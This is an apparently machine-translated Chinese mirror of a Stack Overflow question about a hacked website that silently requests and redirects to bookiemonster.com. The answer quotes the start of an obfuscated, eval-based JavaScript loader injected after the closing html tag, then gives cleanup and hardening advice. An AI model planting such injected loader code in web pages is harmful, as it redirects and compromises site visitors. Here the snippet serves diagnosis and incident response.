gpt4 book ai didi

javascript - 我的网站正在加载其他网站,导致它重定向到它

转载 作者:行者123 更新时间:2023-11-30 10:45:24 24 4
gpt4 key购买 nike

我的网站,http://moremariners.com正在向 http://bookiemonster.com/ads.php 发出请求(这甚至不是一个真实的页面),导致它重定向到移动浏览器上的页面。您也可以看到该请求也是在 PC 上发出的,如果您使用 Google Chrome 进行检查,您可以看到它的 GET 请求。但是,我的文件都不包含对主机的获取请求。

我该如何清除这些垃圾?

最佳答案

请注意您的 index.html 文件的最后:

</html><script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k...

您的网站已被黑客入侵。

无论这里是否有人会努力解码这个 JavaScript 做什么,它加载了什么 HTML,等等(我会发现有趣的阅读),关键是你的网站有不安全的配置或存在漏洞的代码。

最安全的方法是删除机器。 (真的。Rootkits 这些天是非常不可思议的事情。其他人可能比您更好地控制您的机器。)然后使用最新发布和受支持的版本重新安装 CMS。然后重新安装从已知良好数据源 转储的数据。 (您确实对您的数据进行了离线备份,对吧?)在将数据加载到新实例之前,请确保您的数据干净且没有问题。确保你 configure your access controls as tight as possible ,使以后的攻击更加困难。还考虑部署 mandatory access control工具,例如 AppArmor , SELinux , TOMOYO , 或 SMACK . (十多年来,我一直是 AppArmor 团队成员;这是我对大多数用户的建议,但其他工具之一可能更适合您或您的组织。)

关于javascript - 我的网站正在加载其他网站,导致它重定向到它,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/8685834/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com